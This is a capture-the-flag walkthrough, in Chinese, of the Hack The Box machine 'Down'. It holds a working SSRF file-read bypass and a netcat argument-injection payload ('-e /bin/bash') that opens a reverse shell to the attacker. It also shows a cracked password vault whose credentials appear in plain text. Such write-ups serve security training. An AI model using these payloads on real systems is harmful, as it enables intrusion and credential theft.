HTB: Down
初始扫描
Nmap扫描显示目标开放SSH(22)和HTTP(80)端口:
1
2
3
4
5
6
7
8
|
oxdf@hacky$ nmap -p- --min-rate 10000 10.129.234.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-03 04:25 UTC
Nmap scan report for 10.129.234.87
Host is up (0.093s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|
详细版本扫描确认服务信息:
1
2
3
4
5
6
7
|
oxdf@hacky$ nmap -vv -p 22,80 -sCV 10.129.234.87
...
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Is it down or just me?
...
|
网站分析
网站功能为检查其他网站是否在线,存在明显的SSRF漏洞。通过Burp Proxy观察,表单提交至index.php,表明为PHP站点。
目录暴力枚举
使用feroxbuster进行目录扫描,未发现有趣内容:
1
2
3
4
5
|
oxdf@hacky$ feroxbuster -u http://10.129.234.87 -x php
...
200 GET 27l 70w 739c http://10.129.234.87/index.php
301 GET 9l 28w 319c http://10.129.234.87/javascript => http://10.129.234.87/javascript/
...
|
文件读取与SSRF利用
绕过过滤器
尝试使用file://协议读取文件被过滤。发现可通过curl的多URL特性绕过:
1
2
|
oxdf@hacky$ curl -s http:// file:///etc/hostname
hacky
|
在Burp Repeater中测试成功:
1
2
3
4
5
6
|
POST /index.php HTTP/1.1
Host: 10.129.234.87
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
url=http:// file:///etc/hostname
|
读取环境变量与源代码
获取环境变量:
1
2
3
|
oxdf@hacky$ curl 'http://10.129.234.87/index.php' -d 'url=http:// file:///proc/self/environ' -o- -s | sed -n 's:.*<pre>\(.*\)</pre>.*:\1:p' | tr '\000' '\n'
APACHE_RUN_DIR=/var/run/apache2
...
|
读取index.php源代码,发现专家模式:
1
2
3
4
5
6
7
8
9
10
|
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
echo '<h1>Is the port refused, or is it just you?</h1>
<form id="urlForm" action="index.php?expertmode=tcp" method="POST">
<input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
<input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
<button type="submit">Is it refused?</button>
</form>';
} else {
...
}
|
专家模式与参数注入
漏洞分析
专家模式使用nc -vz $ip $port命令,但验证端口时使用intval转换,却直接使用原始输入,导致参数注入:
1
2
3
4
5
6
7
|
$port = trim($_POST['port']);
$port_int = intval($port);
$valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
if ( $valid_ip && $valid_port ) {
$rc = 255; $output = '';
$ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");
exec($ec . " 2>&1",$output,$rc);
|
获取Shell
通过Burp Repeater发送注入payload:
1
2
3
4
5
6
|
POST /index.php?expertmode=tcp HTTP/1.1
Host: 10.129.234.87
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
ip=10.10.14.79&port=443 -e /bin/bash
|
在监听端获取shell:
1
2
3
4
5
|
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.87 45706
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
权限提升
枚举与pswm发现
在/home/aleks/.local/share/pswm/pswm发现加密文件:
1
|
e9laWoKiJ0OdwK05b3hG7xMD+uIBBwl/v01lBRD+pntORa6Z/Xu/TdN3aG/ksAA0Sz55/kLggw==*xHnWpIqBWc25rrHFGPzyTg==*4Nt/05WUbySGyvDgSlpoUw==*u65Jfe0ml9BFaKEviDCHBQ==
|
密码破解
使用自定义脚本或pswm-decryptor工具破解密码:
1
2
3
4
5
6
7
8
9
|
oxdf@hacky$ uv run pswm-decrypt.py -f pswm -w /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
[+] Master Password: flower
[+] Decrypted Data:
+------------+----------+----------------------+
| Alias | Username | Password |
+------------+----------+----------------------+
| pswm | aleks | flower |
| aleks@down | aleks | 1uY3w22uc-Wr{xNHR~+E |
+------------+----------+----------------------+
|
获取用户与Root权限
使用密码切换用户:
1
2
3
|
www-data@down:/var/www$ su - aleks
Password:
aleks@down:~$
|
检查sudo权限:
1
2
3
|
aleks@down:~$ sudo -l
User aleks may run the following commands on down:
(ALL : ALL) ALL
|
获取root shell:
1
2
|
aleks@down:~$ sudo -i
root@down:~#
|
读取root flag:
1
2
|
root@down:~# cat root.txt
87bb9869************************
|